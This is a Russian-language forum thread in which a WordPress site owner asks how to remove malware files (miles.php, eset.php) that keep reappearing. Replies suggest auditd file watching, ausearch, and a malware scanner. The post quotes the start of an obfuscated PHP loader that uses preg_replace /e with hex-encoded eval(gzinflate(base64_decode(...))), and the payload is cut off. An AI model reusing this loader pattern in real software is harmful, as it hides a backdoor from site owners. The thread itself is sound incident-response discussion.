Автоматический создается файлы miles.php и eset.php

bunagi
На сайте с 27.09.2009
Offline
74
849

Сайт на wordpress, на сервере обнаружил подозрительные файлы: miles.php и eset.php, внутри содержат код!

<?php

preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'lb3LriRbj6Q3F6B3+FGogTRpbPd1i0BBb8JJXLuB0qi6W/gfXxkM+4xrp4SCNEicPJk7I9zXhTSSRuO//vP8n

... и.т.д очень длинный код.

Понятно что какой то вирус, но эти файлы при удалении через несколько минут появляются заново.

Как найти и удалить вирус окончательно?

https://medportal.su (https://medportal.su) Медицинский информационный портал
С
На сайте с 14.04.2011
Offline
63
#1

auditd настройте.

bunagi
На сайте с 27.09.2009
Offline
74
#2
Сентябрь:
auditd настройте.

Можно конкретнее? Как это сделать?

С
На сайте с 14.04.2011
Offline
63
#3

Устанавливаете, добавляете в /etc/audit/audit.rules строку:

-w <путь к сайту> -F perm=aw

запускаете.

В /var/log/audit/audit.log будет видно какой айди, какой командой создаёт ваши файлы.

Или так:

ausearch -f miles.php
K5
На сайте с 21.07.2010
Offline
209
#4

проверяйте сайт ай-болитом, что нибудь левое наверняка всплывет.

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий